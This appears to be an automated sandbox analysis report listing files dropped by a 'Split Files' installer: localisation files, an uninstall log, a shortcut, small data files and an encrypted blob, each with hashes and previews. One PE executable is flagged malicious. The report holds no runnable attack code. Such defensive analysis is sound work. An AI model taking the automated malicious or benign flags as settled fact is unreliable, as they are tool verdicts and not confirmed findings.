                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2718
                Entropy (8bit):5.057121428169199
                Encrypted:false
                SSDEEP:48:HGPWFaxAA+sqKvFYLcunHh3QxXOBp1OB5r70h3CGRsJE0laDwXCqXH5wGF5JoCPa:HGPAPZBAJU1k7Jb245xVfUMG
                MD5:21B4D47F5D851271C89310C92777FB70
                SHA1:9D85FF8F7107CFAE3F31993FAF7F249591AFCB27
                SHA-256:D88AE9E292EBC4E56767892FD451E2E8278FCE776CAD689731EE7875748D55D7
                SHA-512:46F26B51D6959A36E33266887E39CB98E7E67880052DE8DE741CB93C90ED3B28C87A224CE710E6C698FE648ED8B062E73DEDC253A6C5A8362EB3EF2792AB4FBF
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Archivo'..MExit->Caption = 'Salir'..MOptions->Caption = 'Options'..MSettings->Caption = 'Herramientas'..MLanguage->Caption = 'Elegir idioma'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Holand.s'..MLangEnglish->Caption = 'Ingl.s'..MLangFrench->Caption = 'Franc.s'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Ruso'..MLangSpanish->Caption = 'Espa.ol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Ayuda'..MAbout->Caption = 'Sobre programa'....TabSheetSplit->Caption = 'SEPARAR'..TabSheetCombine->Caption = 'JUNTAR'....GroupBoxCombine->Caption = ' Drag and drop una de las partes para juntar en la celda 'Primera Parte' o navegar '..LabelFirstFile->Caption = 'Primera Parte:'..LabelOutput->Caption = 'Nombre Archivo salida:'..LabelCombineFolder->Caption = 'Carpeta salida:'..LabelSplitFolder->Caption = 'Carpeta salida:'..ButtonCombine->Caption = 'JUNTAR'..ButtonStopCombine->Caption = 'PARAR'....
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2607
                Entropy (8bit):5.234177949162883
                Encrypted:false
                SSDEEP:48:HGUyjEiB0w3l+sqiTh7XJ9UeHjIDt00AoB/nheSSMpSSSxPYe:HGpNBrkGIDt0qnheS9Sx
                MD5:E1271E0DDD609CD7F9C2367D32FEBE4B
                SHA1:0A420424F1FADE0BFF002E63AAD22B5E94B86CAC
                SHA-256:AEE6B1EDFFFCE507E2207C7E2AA36DA42B2AC54CEB28B9759B2D05F1012CBA8F
                SHA-512:86A11C9E4B59F2437180F56CAD44E69CB29B03B93983EA5E35CBCC5BDD40CFC424EE1EEF519B2E44D67623C79835AF92B4B089AC29890C046CD590C1F8BFA574
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Dosya'..MExit->Caption = 'Uygulamay. Kapat'..MOptions->Caption = 'Se.enekler'..MSettings->Caption = 'Ayarlar'..MLanguage->Caption = 'Dil'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Yard.m'..MAbout->Caption = 'Hakk.nda'....TabSheetSplit->Caption = 'PAR.ALA'..TabSheetCombine->Caption = 'B.RLE.T.R'....GroupBoxCombine->Caption = ' .lk par.ay. s.r.kleyin yada g.zat. kullan.n '..LabelFirstFile->Caption = '.lk Par.a:'..LabelOutput->Caption = 'Birle.tirme Ad.:'..LabelCombineFolder->Caption = '..kt. Klas.r.:'..LabelSplitFolder->Caption = '..kt. Klas.r.:'..ButtonCombine->Caption = 'B.RLE.T.R'..ButtonStopCombine->Caption = 'DUR'....GroupBoxSplit->Caption = ' B.lmek istedi.iniz dosyay.
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):2594
                Entropy (8bit):5.044497576650396
                Encrypted:false
                SSDEEP:48:HGgb5l+sqiTh7XJ9oVHo1xx0GHLVQ4ZWGAtDAEQmUDcQdWym:HGdpa1jfHLVQ4AGAtWma8H
                MD5:76776746B3CFF1CBD5D56CD44CA2DEF5
                SHA1:2F2ECA50BD7F72232BE84291EF1A7956C24098CC
                SHA-256:EC647D30931F50607CF745D958AAF0367CCEAB9999346188255CFBFB22301EE3
                SHA-512:202436C708D4F34FFCCDC3D33841246C5CEE073AC270DA547C15F9E995A08D36AE4C00982283BF60D62363046BBEAA0125D59075E4629A9D1934039CBFB00BE5
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Exit Application'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Language'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Help'..MAbout->Caption = 'About'....TabSheetSplit->Caption = 'SPLIT'..TabSheetCombine->Caption = 'JOIN'....GroupBoxCombine->Caption = ' Drag and drop one of the files to join in the 'First Part' box or browse to it '..LabelFirstFile->Caption = 'First Part:'..LabelOutput->Caption = 'Output File Name:'..LabelCombineFolder->Caption = 'Output Folder:'..LabelSplitFolder->Caption = 'Output Folder:'..ButtonCombine->Caption = 'JOIN'..ButtonStopCombine->Caption = 'STOP'....GroupBoxSplit->Caption = ' Drag
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2607
                Entropy (8bit):5.234177949162883
                Encrypted:false
                SSDEEP:48:HGUyjEiB0w3l+sqiTh7XJ9UeHjIDt00AoB/nheSSMpSSSxPYe:HGpNBrkGIDt0qnheS9Sx
                MD5:E1271E0DDD609CD7F9C2367D32FEBE4B
                SHA1:0A420424F1FADE0BFF002E63AAD22B5E94B86CAC
                SHA-256:AEE6B1EDFFFCE507E2207C7E2AA36DA42B2AC54CEB28B9759B2D05F1012CBA8F
                SHA-512:86A11C9E4B59F2437180F56CAD44E69CB29B03B93983EA5E35CBCC5BDD40CFC424EE1EEF519B2E44D67623C79835AF92B4B089AC29890C046CD590C1F8BFA574
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Dosya'..MExit->Caption = 'Uygulamay. Kapat'..MOptions->Caption = 'Se.enekler'..MSettings->Caption = 'Ayarlar'..MLanguage->Caption = 'Dil'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Yard.m'..MAbout->Caption = 'Hakk.nda'....TabSheetSplit->Caption = 'PAR.ALA'..TabSheetCombine->Caption = 'B.RLE.T.R'....GroupBoxCombine->Caption = ' .lk par.ay. s.r.kleyin yada g.zat. kullan.n '..LabelFirstFile->Caption = '.lk Par.a:'..LabelOutput->Caption = 'Birle.tirme Ad.:'..LabelCombineFolder->Caption = '..kt. Klas.r.:'..LabelSplitFolder->Caption = '..kt. Klas.r.:'..ButtonCombine->Caption = 'B.RLE.T.R'..ButtonStopCombine->Caption = 'DUR'....GroupBoxSplit->Caption = ' B.lmek istedi.iniz dosyay.
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2266
                Entropy (8bit):5.4593359267896355
                Encrypted:false
                SSDEEP:48:HG8il+sqirh7zJ9YTHskp1r4phFAqLNnK9h:HGkSkp1r4NTKf
                MD5:4ABA9765EB3555788F5706D87A9D2DCA
                SHA1:36C0895FBF9F99690CA55C54CC56310E24513113
                SHA-256:E99B943206594C04BC0383669D04D4F191A501F46D2474FED08B997F8020B433
                SHA-512:3498485635AFC548663715D22071611BAB10C707E8E24BE0B5143EE4A27727DA7D18A5E6959E3F6DD7D0F615DDFD50CE9FC5CE8AE6DDC5BEE287B5A00A817288
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...'..MExit->Caption =' ....'..MOptions->Caption = 'Options'..MSettings->Caption =' .........'..MLanguage->Caption =' ......'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption =' .......'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = '....'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption =' .......'..MAbout->Caption =' ...'....TabSheetSplit->Caption = ' ... .......'..TabSheetCombine->Caption = ' ...'....GroupBoxCombine->Caption =' ... .......'..LabelFirstFile->Caption = '..... .....:'..LabelOutput->Caption = '... ....:'..LabelCombineFolder->Caption =' .... ......:'..LabelSplitFolder->Caption = '.... ......:'..ButtonCombine->Caption =' ...'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = '... .......'..LabelFileName->Caption =' ..... ...: '..LabelSplitFolder->Caption =' .... ......:'
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2718
                Entropy (8bit):5.057121428169199
                Encrypted:false
                SSDEEP:48:HGPWFaxAA+sqKvFYLcunHh3QxXOBp1OB5r70h3CGRsJE0laDwXCqXH5wGF5JoCPa:HGPAPZBAJU1k7Jb245xVfUMG
                MD5:21B4D47F5D851271C89310C92777FB70
                SHA1:9D85FF8F7107CFAE3F31993FAF7F249591AFCB27
                SHA-256:D88AE9E292EBC4E56767892FD451E2E8278FCE776CAD689731EE7875748D55D7
                SHA-512:46F26B51D6959A36E33266887E39CB98E7E67880052DE8DE741CB93C90ED3B28C87A224CE710E6C698FE648ED8B062E73DEDC253A6C5A8362EB3EF2792AB4FBF
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Archivo'..MExit->Caption = 'Salir'..MOptions->Caption = 'Options'..MSettings->Caption = 'Herramientas'..MLanguage->Caption = 'Elegir idioma'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Holand.s'..MLangEnglish->Caption = 'Ingl.s'..MLangFrench->Caption = 'Franc.s'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Ruso'..MLangSpanish->Caption = 'Espa.ol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Ayuda'..MAbout->Caption = 'Sobre programa'....TabSheetSplit->Caption = 'SEPARAR'..TabSheetCombine->Caption = 'JUNTAR'....GroupBoxCombine->Caption = ' Drag and drop una de las partes para juntar en la celda 'Primera Parte' o navegar '..LabelFirstFile->Caption = 'Primera Parte:'..LabelOutput->Caption = 'Nombre Archivo salida:'..LabelCombineFolder->Caption = 'Carpeta salida:'..LabelSplitFolder->Caption = 'Carpeta salida:'..ButtonCombine->Caption = 'JUNTAR'..ButtonStopCombine->Caption = 'PARAR'....
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2729
                Entropy (8bit):5.029883215699414
                Encrypted:false
                SSDEEP:48:HGgS7++sqMsmQYEJK7bHExsA9GZ1MTn6btlOWH6r3zvX5c9WYN:HGjUoR9GXML6RYWH6rDRdYN
                MD5:8AFE543CB6791AA250312EBA61BF7C13
                SHA1:BFD229D43BE86728A634055AD65860157C2671BD
                SHA-256:AF5BFB663E715C48C55E24BC3BEA30FCAA9BE8EAF35133FBB75D54C5735696AC
                SHA-512:5CF85F84DD6D363B2AAC720CF10C5289350EB706DC2BF5CA824CF220C3607CC7969CDD2F4B2912DC97C7BE50CEDC24A9A01AFC585CE84B6B8CB81419153931A2
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Termina programma'..MOptions->Caption = 'Options'..MSettings->Caption = 'Impostazioni'..MLanguage->Caption = 'Seleziona Lingua'..MLangArabic->Caption = 'Arabo'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Olandese'..MLangEnglish->Caption = 'Inglese'..MLangFrench->Caption = 'Francese'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Russo'..MLangSpanish->Caption = 'Spagnolo'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aiuto'..MAbout->Caption = 'Informazioni'....TabSheetSplit->Caption = 'DIVIDI'..TabSheetCombine->Caption = 'UNISCI'....GroupBoxCombine->Caption = ' Drag and drop una delle parti da unire nella casella 'Prima Parte' o segui percorso '..LabelFirstFile->Caption = 'Prima Parte:'..LabelOutput->Caption = 'Nome File Uscita:'..LabelCombineFolder->Caption = 'Cartella Uscita:'..LabelSplitFolder->Caption = 'Cartella Uscita:'..ButtonCombine->Caption = 'UNISCI'..ButtonStopCombine->Caption = '
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2299
                Entropy (8bit):5.691502190790686
                Encrypted:false
                SSDEEP:48:HG9uhjkDYhqGQjsONHiHQgGU9dm6nclk6a1hg22mo6LD:HGnzLIQTUPmcclGsmogD
                MD5:F9F47FF3D866FFC4F38E315E41356E55
                SHA1:EFC313A99993B5FB8A454D4C5197C6F3965B5C89
                SHA-256:3A13CCE54190BF4A679D21F61466A0A18E9340287CAA1AA4EACB38C99C9D4957
                SHA-512:6EC1F1E19921C535A50254500ED01602DA74D3CC9E6DA8B5FC78D89255E42C5968BD294E56F584EE273630B9233C20CAFEBC906354CE393FE1CFFE91528F527A
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&....'..MExit->Caption = '.....'..MOptions->Caption = '.....'..MSettings->Caption = '.........'..MLanguage->Caption = '....'..MLangEnglish->Caption = '..........'..MLangRussian->Caption = '.......'..MLangArabic->Caption = '........'..MLangChinese->Caption = '.........'..MLangDutch->Caption = '.......'..MLangFrench->Caption = '...........'..MLangItalian->Caption = '...........'..MLangSpanish->Caption = '.........'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '......'..MAbout->Caption = '. .........'....TabSheetSplit->Caption = '.......'..TabSheetCombine->Caption = '.......'....GroupBoxCombine->Caption = ' ....... ..... '..LabelFirstFile->Caption = '1-. ....:'..LabelOutput->Caption = '........: '..LabelCombineFolder->Caption = '..........:'..ButtonCombine->Caption = '.......'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = ' ....... .... '..LabelSplitFolder->Caption = '..........:'..LabelFileName->Caption = '... .....:'..LabelFile
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2345
                Entropy (8bit):5.847861612631974
                Encrypted:false
                SSDEEP:48:HGj2lE8qiTh7XJ9zHadtPTTD1n34q1jgun1ITq8K:HG5RDTln34qRgusK
                MD5:A5C9FEA89EFE8E2162BA477E8EA39B44
                SHA1:E6A2042C574D14786891F0C32F92C8292BBB4ACA
                SHA-256:8DDFB50DACA491296101BAB3DB9B77C7587127E684D9E22EFD6DC93F84A008FA
                SHA-512:3F7944F262717D308A1235982E741536DA6A4DF9ABEE4E2811E1151B53C3D31811EA3EB750ED39F347F7DF14AD20FF981C85CC2DA297BE745547B36D41B8FDB9
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...(&F)'..MExit->Caption = '.......'..MOptions->Caption = '...'..MSettings->Caption = '....'..MLanguage->Caption = '....'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = '........'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '....'..MAbout->Caption = '....'....TabSheetSplit->Caption = '...'..TabSheetCombine->Caption = '...'....GroupBoxCombine->Caption = ' .......... "......" .............'..LabelFirstFile->Caption = '......'..LabelOutput->Caption = '..........'..LabelCombineFolder->Caption = '.........'..LabelSplitFolder->Caption = '.........'..ButtonCombine->Caption = '...'..ButtonStopCombine->Caption = '..'....GroupBoxSplit->Caption = ' .......... "......."............. '..LabelFileName->Caption = '.
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2507
                Entropy (8bit):5.040552699764577
                Encrypted:false
                SSDEEP:48:HGkOA+sq/W7Yve3EkHaBSDbSljMM+v1/D3H:HGb8hABSDbSJMBD
                MD5:336D33F55222F48FBA19EF0911732766
                SHA1:E17A78E3B48192361DB540B1E8C9D0548C9A9FFE
                SHA-256:0E955453FA27CED0D0521F0F960C7743C2090F06263D33EC8FA978B681123E0C
                SHA-512:67EC6B859BCDD66DA59CDB1DC1A4EACFBDA12C57699012EE1573DD88F5AAAB6288E1BD9015C862689F4A1A27E83B28C3A9C99B1895EDF4F47D6F94B0557CDC1F
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Fichier'..MExit->Caption = 'Quitter'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Langage'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Flamand'..MLangEnglish->Caption = 'Englais'..MLangFrench->Caption = 'Francais'..MLangItalian->Caption = 'Italien'..MLangRussian->Caption = 'Russe'..MLangSpanish->Caption = 'Espagnol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aide'..MAbout->Caption = 'A propos de ..'....TabSheetSplit->Caption = 'Scinder'..TabSheetCombine->Caption = 'Assembler'....GroupBoxCombine->Caption = ' Faire glisser un des fichiers bloc . assembler ou rechercher le par ... '..LabelFirstFile->Caption = 'Premier Fichier:'..LabelOutput->Caption = 'Fichier de sortie: '..LabelCombineFolder->Caption = 'R.pertoire Dest.'..LabelSplitFolder->Caption = 'R.pertoire Dest.'..ButtonCombine->Caption = 'Assembler'..ButtonStopCombine->Caption = 'Stop'....GroupBoxSpl
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2687
                Entropy (8bit):5.051567814097503
                Encrypted:false
                SSDEEP:48:HGgXRVA+sqgh59WJIo4yvHIExBMHkWREHZDNbHBsBOtiSZls5crRMfiE:HGusSgEvMHfREHN9hsoiOUBiE
                MD5:D2471D35D833E2544D67365E015E6153
                SHA1:497EE8FF9519D025BD10C5AA15DDC34DFB1B334B
                SHA-256:4831DDBCFE327E2542F4565E7A948C5828D71003B8444723E1E11BA6BB43ACE7
                SHA-512:C82B30D604A679F87B8D0B1670A0D1607E25150FFCFD1C9E631241916BA93CEB5A33AFCAA9080149096ACA1913791384860F5699F2BB302B6CB190AF777EB3CE
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Programma Afsluiten'..MOptions->Caption = 'Options'..MSettings->Caption = 'Instellingen'..MLanguage->Caption = 'Kies Taal'..MLangArabic->Caption = 'Arabisch'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Nederlands'..MLangEnglish->Caption = 'Engels'..MLangFrench->Caption = 'Frans'..MLangItalian->Caption = 'Italiaans'..MLangRussian->Caption = 'Russisch'..MLangSpanish->Caption = 'Spaans'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Hulp'..MAbout->Caption = 'Info'....TabSheetSplit->Caption = 'SPLITSEN'..TabSheetCombine->Caption = 'HERENIGEN'....GroupBoxCombine->Caption = ' Drag and drop een van de te herenigen delen in 'Eerste Deel' of browse ernaartoe '..LabelFirstFile->Caption = 'Eerste Deel:'..LabelOutput->Caption = 'Output Bestandsnaam:'..LabelCombineFolder->Caption = 'Output Map:'..LabelSplitFolder->Caption = 'Output Map:'..ButtonCombine->Caption = 'HERENIGEN'..ButtonStopCombine->Caption = 'STOP'....Grou
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:InnoSetup Log Split Files {215D64A9-0240-4952-9F4D-4D0A65391F2C}, version 0x2a, 4440 bytes, 760639\user, "C:\Program Files (x86)\Split Files"
                Category:dropped
                Size (bytes):4440
                Entropy (8bit):4.694474322424776
                Encrypted:false
                SSDEEP:48:kYm+aDkyMlLBv8rD85pPmUIrBdcoINLFhqkLVO3471hD5WpPLDfDxLDvvDHD1Doh:k6jZp8rD85pPmaoINFhqYOIhHeSk9Wh
                MD5:53C436BD0D2549BA1258A77A841B5A9A
                SHA1:5F7B0A6634430337111FA045E4F2E0128A8DB7CB
                SHA-256:A358BD2018A9F35635AF323C85172C5B9850FDCCC8F952C49D38D842328C3C86
                SHA-512:BD64AB964DAF92C20189970BB5C26813315BAA552473E65CC8386D83C7E0100519184CA276BE75E02381837E53ED726CF3B46BAB16CD22240B1641D2879846A9
                Malicious:false
                Preview:Inno Setup Uninstall Log (b)....................................{215D64A9-0240-4952-9F4D-4D0A65391F2C}}.........................................................................................Split Files.....................................................................................................................*.......X...%.................................................................................................................Da....s....F........B....760639.user"C:\Program Files (x86)\Split Files.................. ..........R.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..'...dll:kernel32.dll.CreateFileA.............#...dll:kernel32.dll.WriteFile...........!...dll:kernel32.dll.CloseHandle.......!...dll:kernel32.dll.ExitProcess.......$...dll:User32.dll.GetSystemMetr
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):789258
                Entropy (8bit):6.369988626022893
                Encrypted:false
                SSDEEP:12288:EpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOU:emt2bfrP437QzH/A6A7E7dVPUxOU
                MD5:D3BA43B9E1B3838F28AFC558F2991D5B
                SHA1:1132F1C76760281A591F7DF99D592283103FCC87
                SHA-256:1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
                SHA-512:870371843F59B91D75B6C4D4C637075235D25CF3ABB059B58E39F9CD2833533A8F434307E7AD1175FD45082D3B4E4F0ED79F303ED77DEF553587E2819C092022
                Malicious:true
                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:MS Windows 95 Internet shortcut text (URL=<http://www.altarsoft.com/split_files.shtml>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):97
                Entropy (8bit):5.12302231676258
                Encrypted:false
                SSDEEP:3:HRAbABGQYm/0S4UEtSNM5LTJOBCBuQpQQXXy:HRYFVm/r4UEtSeVTJuZQplHy
                MD5:DCD6923B008121BFF4C7C0AA1206286E
                SHA1:AD4EF16A96A80C8EA5DBC5933229580BC6C332E0
                SHA-256:E1E01BFA5E2B5A117A627F7E9E861CF63D852A66BCE0DF88094D59CAF61E4376
                SHA-512:EC4A399EB38A1FA64DF8990708168F134ACD0CA793930E57C6D3A260A537B20DFD9F8B7232987F32EC1C1A7CEC7EC91F15A644A63D275104D96588FC3D354B5C
                Malicious:false
                Preview:[InternetShortcut]..URL=http://www.altarsoft.com/split_files.shtml..Modified=500425EA770BCC01B2..
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:data
                Category:dropped
                Size (bytes):94224
                Entropy (8bit):7.998072640845361
                Encrypted:true
                SSDEEP:1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
                MD5:418619EA97671304AF80EC60F5A50B62
                SHA1:F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
                SHA-256:EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
                SHA-512:F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
                Malicious:false
                Preview:...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i*)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(*P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=|....'....[1.~.YB:./...A`...=..F..K...........
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):17
                Entropy (8bit):3.1751231351134614
                Encrypted:false
                SSDEEP:3:nCmxEl:Cmc
                MD5:064DB2A4C3D31A4DC6AA2538F3FE7377
                SHA1:8F877AE1873C88076D854425221E352CA4178DFA
                SHA-256:0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
                SHA-512:CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
                Malicious:false
                Preview:UwUoooIIrwgh24uuU
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0
                Process:C:\Users\user\Desktop\file.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):778752
                Entropy (8bit):6.357908612813808
                Encrypted:false
                SSDEEP:12288:cpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOG:2mt2bfrP437QzH/A6A7E7dVPUxOG
                MD5:E8176050192FBB976D70238E3C121F4C
                SHA1:2F1FD24EFE1F3F3FEE775CC3F5255B32F8880900
                SHA-256:AB4FE42A7B708DDB648BB2088216FF47B877AE599FD52FF50359FC1DB8E11EF7
